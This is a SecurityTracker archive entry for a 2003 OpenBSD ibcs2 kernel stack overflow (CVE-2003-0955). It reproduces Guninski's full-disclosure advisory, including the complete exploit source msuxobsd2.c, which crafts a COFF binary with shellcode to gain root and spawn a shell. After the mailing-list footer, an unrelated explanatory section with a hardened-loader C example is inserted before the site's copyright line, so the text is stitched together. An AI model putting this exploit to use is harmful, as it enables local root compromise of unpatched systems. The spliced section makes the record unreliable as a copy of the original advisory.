SecurityTracker.com

SecurityTracker Archives

Category:   OS (UNIX)  >   OpenBSD Kernel Vendors:   OpenBSD
OpenBSD Kernel ibcs Overflow Yields Root Privileges to Local Users
SecurityTracker Alert ID:  1008214
SecurityTracker URL:  http://securitytracker.com/id/1008214
CVE Reference:   CVE-2003-0955   (Links to External Site)
Updated:  Nov 24 2003
Original Entry Date:  Nov 17 2003
Impact:   Execution of arbitrary code via local system, Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): Tested on 3.3, 3.4
Description:   A buffer overflow vulnerability was reported in the OpenBSD kernel. A local user can execute arbitrary code to gain root privileges.

Georgi Guninski reported a stack-based kernel overflow in OpenBSD's 'ibcs2_exec.c'.

A demonstration exploit is provided in the Source Message and in the original advisory.

The original advisory is available at:

http://www.guninski.com/msuxobsd2.html

The vendor was reportedly notified on November 15, 2003.

Impact:   A local user can execute arbitrary code with kernel privileges.
Solution:   The vendor has released a fix for OpenBSD 3.4, available via CVS at:

http://www.openbsd.org/cgi-bin/cvsweb/src/sys/compat/ibcs2/ibcs2_exec.c.diff?r1=1.14.6.1&r2=1.14.6.2

Fixes for earlier versions will reportedly be made available shortly.

Vendor URL:  www.openbsd.org/ (Links to External Site)
Cause:   Boundary error

Message History:   This archive entry has one or more follow-up message(s) listed below.
Nov 19 2003 (OpenBSD Issues Fix for 3.3) OpenBSD Kernel ibcs Overflow Yields Root Privileges to Local Users
A fix is available for both OpenBSD 3.3 and 3.4.



 Source Message Contents

Subject:  [Full-Disclosure] OpenBSD kernel overflow, yet still *BSD much better than windows


Georgi Guninski security advisory #64, 2003

OpenBSD kernel overflow, yet still *BSD much better than windows

Please help Liu!
Liu disclosed 13 explorer bugs on one day and now needs a computer of his own.
Please donate at: http://clik.to/donatepc
"The less that you give, you're a taker" 
-- Black Sabbath, http://www.lyricsfreak.com/b/black-sabbath/19364.html


Systems affected:
tested on OpenBSD 3.3 and 3.4, probably other versions also affected


Risk: Medium
Date: 17 November 2003

Legal Notice:
This Advisory is Copyright (c) 2003 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases" and securityfocus, microsoft, cert
and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/msuxobsd2.html
Anything in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:

There is a stack based kernel overflow in OpenBSD 3.3, 3.4 and probably earlier
in ibcs2 code. Exploit code is available for 3.3. On 3.4 the kernel is
panicked with a smashed stack; ease of exploitation is currently unknown.

Details:
The problem is in:
"ibcs2_exec.c" line 427 of 738
	char buf[128], *bufp;	
	int len = sh.s_size, path_index, entry_len;
		
	error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t) buf,
				len, sh.s_scnptr,
				UIO_SYSSPACE, IO_NODELOCKED, p->p_ucred,
				&resid, p);

len is taken from the binary and is used for copying into a stack based buffer,
which is wrong.

Oh, I forgot.
Please help Liu!
Liu disclosed 13 explorer bugs on one day and now needs a computer of his own.
Please donate at: http://clik.to/donatepc
"The less that you give, you're a taker" 
-- Black Sabbath, http://www.lyricsfreak.com/b/black-sabbath/19364.html

--msuxobsd2.c---------------------------------

/*
Legal Notice:
This Advisory is Copyright (c) 2003 Georgi Guninski.
This program cannot be used in "vulnerabilities databases" and 
securityfocus, microsoft, cert and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/msuxobsd2.html
Anything in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

*/
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/sysctl.h>
#include <sys/signal.h>
#include <sys/utsname.h>
#include <sys/stat.h>
#include "/usr/src/sys/compat/ibcs2/ibcs2_exec.h"

// some code taken from noir article from phrack 60

void
get_proc(pid_t pid, struct kinfo_proc *kp)
{
   u_int arr[4], len;

        arr[0] = CTL_KERN;
        arr[1] = KERN_PROC;
        arr[2] = KERN_PROC_PID;
        arr[3] = pid;
        len = sizeof(struct kinfo_proc);
        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
                perror("sysctl");
                fprintf(stderr, "this is an unexpected error, rerun!\n");
                exit(-1);
        }

}
int msux()
{
int fd;
struct coff_filehdr cf;
struct coff_aouthdr ca;
struct coff_scnhdr s1,s2,s3;
int exe[512];
char fil[]="/tmp/vvc";
int v;
unsigned int initpid=0xe7610000;
unsigned int reta=0xe770fc8c;//0xe770bc68; //0xe7719c64;//0xe770bc64;
struct kinfo_proc kp;
long ppid,mypid;
int p,st;

get_proc((pid_t) getppid(), &kp);

ppid=(u_long) kp.kp_eproc.e_paddr;

get_proc((pid_t) getpid(), &kp);
mypid=(u_long) kp.kp_eproc.e_paddr;

// address of kernel's p_comm for 3.3
reta=0x10f+(u_long) kp.kp_eproc.e_paddr; 

printf("ppid=%x mypid=%x %reta=%x\n",ppid,mypid,reta);
fd=open(fil,O_CREAT|O_RDWR,0700);
if (fd==-1) {perror("open");return 1;}
memset(&cf,0,sizeof(cf));
memset(&ca,0,sizeof(ca));
memset(&s1,0,sizeof(s1));
memset(&s2,0,sizeof(s2));
memset(&s3,0,sizeof(s3));
//memset(exe,0xe7,sizeof(exe));
for(v=0;v<sizeof(exe)/sizeof(int);v++) {exe[v]= 0xbabe0000 + v; /*0xcafebabe;*/}
exe[2]=ppid; // to avoid an early crash
exe[1]=reta; // return address

p=st=3; //0xd;

exe[p++]=0xfebabeb9; // shell code
exe[p++]=0x10598bca;
exe[p++]=0x4389c031;
exe[p++]=0x89138b04;
exe[p++]=0x90900442;

*(int*)((int)&exe[st]+1) = ppid;

exe[p++]=0xbabeb850; // call exit1 to return in userland
exe[p++]=0xb850cafe;
exe[p++]=0xd01c59b8;
exe[p++]=0x9090d0ff;

*(int*)((int)&exe[st]+2+5*4) = mypid;

cf.f_magic = COFF_MAGIC_I386 ;
cf.f_nscns=3;
ca.a_magic = COFF_ZMAGIC;
s1.s_flags = COFF_STYP_TEXT;
s2.s_flags = COFF_STYP_DATA;
s3.s_flags = COFF_STYP_SHLIB;
s3.s_size= 128+12*4 + 30*4; //sizeof(exe);
write(fd,&cf,sizeof(cf));
write(fd,&ca,sizeof(ca));
write(fd,&s1,sizeof(s1));
write(fd,&s2,sizeof(s2));
write(fd,&s3,sizeof(s3));
write(fd,exe,sizeof(exe));
printf("Now exec %s\n",fil);
execl(fil,0);
exit(42); // should not be reached if successfull
}

int main(int ac,char **av)
{
uid_t ui;
// this is kernel's p_comm. we first jump here.
char goodfile[]="\x54\x58\x40\x40\x40\x40\xff\xd0";
char tmp[1000];

if (strcmp(av[0],goodfile)) 
	{
	snprintf(tmp,sizeof(tmp),"cp %s \"%s\"",av[0],goodfile);
	system(tmp);execl(goodfile,goodfile,0);
	return 42; //should not be reached
	}
printf("written by georgi\n");
printf("\nPlease help Liu - http://clik.to/donatepc\n\n");
fflush(stdout);
#define SWEETDREAM 2 

if(!fork()) msux();
while(42)
{
sleep(SWEETDREAM);
ui=getuid();
printf("uid=%x\n",ui);
if (ui==0) execl("/bin/sh",0);
}
return 42;
}


----------------------------------------------

Vendor status:
OpenBSD was notified on Sat, 15 Nov 2003 17:57:33 +0200.
Fix: available in cvs for 3.4:
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/compat/ibcs2/ibcs2_exec.c.diff?r1=1.14.6.1&r2=1.14.6.2 
Fixes for earlier versions should be available shortly.

Regards,
Georgi Guninski
http://www.guninski.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
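The defect the advisory describes is a length (sh.s_size) read from an untrusted executable header and passed unchecked as the byte count of a read into a fixed 128-byte stack buffer. The following is an added userland example, not code from the advisory, from the exploit, or from OpenBSD: it models that pattern with a constructed two-field section header and a constructed 4096-byte image, shows the unchecked copy for contrast, and shows the hardened loader that rejects any section larger than the buffer (or lying outside the file) before copying. The header layout, the struct name `section_hdr`, the function names and the use of a plain bounds check as the remedy are all assumptions of this example; the actual OpenBSD fix is in the CVS diff linked above.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the two iBCS2 COFF section-header fields the bug hinges on.
   The real struct coff_scnhdr has more fields; only these two matter here. */
struct section_hdr {
    uint32_t s_scnptr;  /* file offset of the section's contents */
    uint32_t s_size;    /* section length, read straight from the untrusted file */
};

#define SCN_BUF_SIZE 128   /* same size as the kernel's char buf[128] */
#define IMAGE_SIZE   4096  /* size of the constructed executable image */

/* Decode a little-endian 32-bit field, as a loader would read it from the file. */
static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parse the constructed header: s_scnptr at offset 0, s_size at offset 4 (assumed layout). */
static void parse_section_hdr(const uint8_t *hdr, struct section_hdr *sh)
{
    sh->s_scnptr = le32(hdr);
    sh->s_size   = le32(hdr + 4);
}

/* Vulnerable shape: the copy length is whatever the header says. With s_size > 128 this
   writes past buf on the stack. Shown for contrast only; never call it with an oversized header. */
int read_section_unchecked(const uint8_t *image, const struct section_hdr *sh,
                           char buf[SCN_BUF_SIZE])
{
    memcpy(buf, image + sh->s_scnptr, sh->s_size);
    return 0;
}

/* Hardened shape: validate the untrusted length against the destination size and the file
   bounds before touching the buffer. The bounds check is the assumed remedy, not OpenBSD's diff. */
int read_section_checked(const uint8_t *image, size_t image_len,
                         const struct section_hdr *sh, char buf[SCN_BUF_SIZE])
{
    if (sh->s_size > SCN_BUF_SIZE)
        return ENOEXEC;                      /* the missing check: section does not fit */
    if (sh->s_scnptr > image_len || sh->s_size > image_len - sh->s_scnptr)
        return ENOEXEC;                      /* section extends past the end of the file */
    memcpy(buf, image + sh->s_scnptr, sh->s_size);
    return 0;
}

/* Build a constructed image whose section header advertises the given s_size, then load it
   the hardened way. Returns 0 on success or ENOEXEC when the loader rejects it. */
int load_constructed_image(uint32_t advertised_size)
{
    static uint8_t image[IMAGE_SIZE];
    struct section_hdr sh;
    char buf[SCN_BUF_SIZE];
    uint32_t scnptr = 64;                    /* section contents start at offset 64 */

    memset(image, 0x41, sizeof image);       /* constructed filler bytes */
    image[0] = scnptr & 0xff;               image[1] = (scnptr >> 8) & 0xff;
    image[2] = 0;                           image[3] = 0;
    image[4] = advertised_size & 0xff;      image[5] = (advertised_size >> 8) & 0xff;
    image[6] = (advertised_size >> 16) & 0xff; image[7] = (advertised_size >> 24) & 0xff;

    parse_section_hdr(image, &sh);
    return read_section_checked(image, sizeof image, &sh, buf);
}

int main(void)
{
    printf("s_size=64:   %s\n", load_constructed_image(64)   == 0 ? "loaded" : "rejected");
    printf("s_size=128:  %s\n", load_constructed_image(128)  == 0 ? "loaded" : "rejected");
    printf("s_size=4096: %s\n", load_constructed_image(4096) == 0 ? "loaded" : "rejected (ENOEXEC)");
    return 0;
}
```

The check is deliberately placed before the copy and compares against the destination's real size rather than against anything derived from the file, which is what makes the advertised length harmless; the second test guards the read side so that a large s_scnptr cannot walk off the end of the image either.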

Copyright 2021, SecurityGlobal.net LLC